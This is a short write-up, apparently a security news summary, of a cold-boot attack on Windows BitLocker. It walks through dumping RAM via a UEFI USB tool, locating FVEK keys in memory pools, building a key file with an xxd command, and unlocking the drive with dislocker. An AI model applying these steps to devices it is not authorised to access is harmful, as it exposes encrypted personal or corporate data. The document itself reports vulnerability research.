An attacker with physical access can exploit vulnerabilities in Windows by abruptly restarting the device and capturing RAM contents, which allows them to potentially extract sensitive information like FVEK keys, despite challenges like memory degradation.
Techniques like shorting reset pins can mitigate power loss during the restart. While secure boot offers some protection, it has limitations and can be bypassed through various methods.
To create a bootable USB device, users will need a USB drive larger than the target system’s RAM, as the script `flashimage.sh` can be used to simplify this process.
In order to minimize downtime, abruptly restart the target system while Windows is loading but before the login screen appears, which may be particularly useful for finding FVEK keys.
To initiate the memory dump, immediately boot the system from the USB device containing the Memory-Dump-UEFI application, which will launch the UEFI shell. Within the shell, navigate to and execute the ‘app.efi’ file.
The duration of the memory dump process is influenced by the system’s RAM capacity and the USB device’s write speed. To prevent accidental data overwrites, disconnect any extraneous USB storage devices before proceeding.
The memory dump utility will generate dump files until the entire system memory has been processed, and upon completion, safely shut down the computer.
An analysis of Windows 11 memory dumps reveals that the FVEK encryption key can be found in multiple locations, while the primary location is within memory pools tagged by “dFVE,” allocated by the dumpfve.sys driver, which handles BitLocker crash dumps.
The key is typically preceded by 0x0480, signifying XTS-AES-128 encryption, and the key, or parts of it, can be found in memory pools tagged as “None,” allocated through the ExAllocatePool routine.
To unlock a BitLocker-protected partition, determine the algorithm used and obtain the corresponding key. Prepend the algorithm ID (e.g., 0x8004 in little-endian format) to the key in hexadecimal format.
Create a file containing this combined key using a command like `echo “0480b2cbc06071931b7cc50b59f8789571f4dd815c2008e93c02d5c6cd98c83ef54b” | xxd -r -p > output.fvek`.
Utilize the dislocker suite of tools to identify the correct algorithm and unlock the drive. Employ the generated `output.fvek` file to access the data on the BitLocker-protected partition.
By kernel-level debugging with WinDbg, either in a VM or using a USB 3.0 A/A cable, users can observe BitLocker’s implementation in action during the Windows boot process.
While Microsoft attempts to securely erase keys using functions like SymCryptSessionDestroy, NoItinRD analysis reveals that not all keys are completely destroyed.
By stepping through the boot process, users can witness these key remnants persisting on the heap, potentially providing avenues for exploitation, which highlights a potential vulnerability in BitLocker’s key management and destruction mechanisms.
